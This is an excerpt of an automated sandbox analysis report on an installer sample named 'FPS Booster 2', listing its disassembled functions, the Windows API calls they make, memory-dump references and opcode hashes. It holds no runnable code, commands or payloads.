                                                • Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                • Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
                                                • Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
                                                • Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68
                                                Function 6E9E2A4F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 6E9E1C1B: GlobalFree.KERNEL32(?), ref: 6E9E1E69
                                                  • Part of subcall function 6E9E1C1B: GlobalFree.KERNEL32(?), ref: 6E9E1E6E
                                                  • Part of subcall function 6E9E1C1B: GlobalFree.KERNELBASE(?), ref: 6E9E1E73
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E2AFA
                                                • FreeLibrary.KERNEL32(?), ref: 6E9E2B71
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E2B96
                                                  • Part of subcall function 6E9E23C1: GlobalAlloc.KERNEL32(00000040,00000000), ref: 6E9E23F3
                                                  • Part of subcall function 6E9E25B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,?,6E9E2ACB,00000000), ref: 6E9E2611
                                                  • Part of subcall function 6E9E1904: lstrcpyW.KERNEL32(00000000,error,00000000,6E9E287B,00000000), ref: 6E9E1929
                                                  • Part of subcall function 6E9E2445: wsprintfW.USER32 ref: 6E9E24E8
                                                  • Part of subcall function 6E9E2445: GlobalFree.KERNEL32(?), ref: 6E9E2516
                                                  • Part of subcall function 6E9E2445: GlobalFree.KERNEL32(00000000), ref: 6E9E253F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarylstrcpywsprintf
                                                • String ID:
                                                • API String ID: 1767494692-3916222277
                                                • Opcode ID: a2a35e791d9e1092ef2f4420fcf87b79c7a04e2276452d92134279632c4dcc15
                                                • Instruction ID: 8279d55b20873834db8b5a470bd7b93262c8a6c0fdee49632a38897562994eca
                                                • Opcode Fuzzy Hash: a2a35e791d9e1092ef2f4420fcf87b79c7a04e2276452d92134279632c4dcc15
                                                • Instruction Fuzzy Hash: 513113B1004303EACF569FF598D4BEA3BACAF46318F044825EB15AB996DB74C484CF20
                                                Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405EC9
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: nsa
                                                • API String ID: 1716503409-2209301699
                                                • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                • String ID: HideWindow
                                                • API String ID: 1249568736-780306582
                                                • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                Function 00405EFF Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,?,00406961,80000002,Software\Microsoft\Windows\CurrentVersion,?,Show,Show), ref: 00405F29
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406961,80000002,Software\Microsoft\Windows\CurrentVersion,?,Show,Show), ref: 00405F4B
                                                • RegCloseKey.ADVAPI32(?,?,00406961,80000002,Software\Microsoft\Windows\CurrentVersion,?,Show,Show), ref: 00405F72
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID:
                                                • API String ID: 3677997916-0
                                                • Opcode ID: e9468859d61dcce158ce22ede5d95f34131f4b6b0126778e464419491138bf2a
                                                • Instruction ID: d8ff75e547a89f66f52e3818bcd6474306829ed6582f4142105bf0ba28143ce7
                                                • Opcode Fuzzy Hash: e9468859d61dcce158ce22ede5d95f34131f4b6b0126778e464419491138bf2a
                                                • Instruction Fuzzy Hash: C501087525020AAADF21CF74DD05BDB3BA8EF18355F004426FA04E21A0E339D964DBA9
                                                Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                • String ID:
                                                • API String ID: 310444273-0
                                                • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                Function 6E9E124C Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ErrorImageLastLoad
                                                • String ID:
                                                • API String ID: 2189606529-0
                                                • Opcode ID: c11d6df1e5ed27f58a16eddfc365f9d334f729649cafc65e906bdab6e1054ece
                                                • Instruction ID: 5a511ddd5745f071100f32b9b20b2a74b3e2510cd1b2dc046570f87641487282
                                                • Opcode Fuzzy Hash: c11d6df1e5ed27f58a16eddfc365f9d334f729649cafc65e906bdab6e1054ece
                                                • Instruction Fuzzy Hash: E25172B6908605DFDB12DFE5D8807A937ACEF8A32AF204825DB04C7A40D735E9858E95
                                                Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                Function 004030A9 Relevance: 3.0, APIs: 2, Instructions: 22windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,0000000B,?), ref: 004030B7
                                                • InvalidateRect.USER32(?), ref: 004030C7
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: InvalidateMessageRectSend
                                                • String ID:
                                                • API String ID: 909852535-0
                                                • Opcode ID: 337b4f3098a58c01f74da730f62913a30fccabcaf2905223f53fb7e0a8071384
                                                • Instruction ID: 9932014c1c3a6caf672a85f81a9f93a0f21211325c1985b9384409f2a2a137ba
                                                • Opcode Fuzzy Hash: 337b4f3098a58c01f74da730f62913a30fccabcaf2905223f53fb7e0a8071384
                                                • Instruction Fuzzy Hash: E7E046B2A00004FFEB00DF98EC809AE7BB9EB80306B1085B6E212F1060C3354E00DB28
                                                Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405E73
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                Function 6FFB1E34 Relevance: 2.5, APIs: 2, Instructions: 29stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrcpynW.KERNEL32(?,?,6FFB1053,?,6FFB1053,?), ref: 6FFB1E62
                                                • GlobalFree.KERNELBASE ref: 6FFB1E72
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FreeGloballstrcpyn
                                                • String ID:
                                                • API String ID: 1459762280-0
                                                • Opcode ID: 5959595e0d0d3765c1ca15f8a24f97434127daad6d5a0f437a5ea01b6209eee7
                                                • Instruction ID: 6ef5f49a5dec94933565c4419472a307f7ff1e4d8d148ac077bcd7b615e3d863
                                                • Opcode Fuzzy Hash: 5959595e0d0d3765c1ca15f8a24f97434127daad6d5a0f437a5ea01b6209eee7
                                                • Instruction Fuzzy Hash: 2DF0F832265610DFDB11DF25CA84B9677E8BF0A751F01482AE495C7260D730F814CF60
                                                Function 6FFB1E83 Relevance: 2.5, APIs: 2, Instructions: 21memorystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1E99
                                                • lstrcpynW.KERNEL32(00000004,00000104,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1EAF
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: AllocGloballstrcpyn
                                                • String ID:
                                                • API String ID: 3204721840-0
                                                • Opcode ID: d495d905f6b621a16b9db777aa06a006ef8efb7afb9a25ef1e262331709ffe92
                                                • Instruction ID: 67e44cd35acb6d3d5ad84a66b4c6237ebb963db138e345f6b74e9c7e611e499f
                                                • Opcode Fuzzy Hash: d495d905f6b621a16b9db777aa06a006ef8efb7afb9a25ef1e262331709ffe92
                                                • Instruction Fuzzy Hash: 73F0AE7A514A10AFCB10AF54CA84F917BE8FB0E3A6B014415FA49873A0D230A864CF50
                                                Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                Function 6E9E2728 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(6E9E4020,00000004,00000040,6E9E4028), ref: 6E9E2746
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 1948995302cad62d405a4693e9fb8bca954830d691b8d6c1f862f771b31c334f
                                                • Instruction ID: c21fcbdea15def82bb79ce4db6a05078bc0c60e089be4ed425c44e81dcca8724
                                                • Opcode Fuzzy Hash: 1948995302cad62d405a4693e9fb8bca954830d691b8d6c1f862f771b31c334f
                                                • Instruction Fuzzy Hash: D0E0AEF1919B40DECB91CFB89444B213AE0AF5F317B01453AA348D6382E2308A069F19
